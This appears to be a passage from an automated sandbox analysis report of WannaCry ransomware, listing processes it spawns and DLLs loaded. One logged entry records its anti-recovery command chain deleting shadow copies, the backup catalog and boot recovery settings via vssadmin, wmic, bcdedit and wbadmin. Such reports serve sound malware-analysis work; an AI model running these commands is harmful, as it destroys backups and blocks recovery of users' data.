              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6008 686 000002152F62E5C0Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 7551728024260.batJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: msvcp60.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mrmcorer.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.ui.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: inputhost.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: biwinrt.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: vccorlib140_app.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: msvcp140_app.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: vcruntime140_app.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: vcruntime140_app.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: vcruntime140_1_app.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: winrttracing.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wpnapps.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.storage.applicationdata.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.applicationmodel.background.timebroker.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.web.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mrmcorer.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: biwinrt.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wincorlib.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: bingconfigurationclient.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.storage.applicationdata.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windowsudk.shellcommon.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: dictationmanager.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: slc.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.ui.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: inputhost.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: languageoverlayutil.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.web.http.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: audioses.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: winmmbase.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mmdevapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mmdevapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.cortana.proxystub.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.security.authentication.onlineid.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: profext.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: certenroll.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: certca.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: dsparse.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: mlang.dll
              Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: windows.web.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: linkinfo.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ntshrui.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cscapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
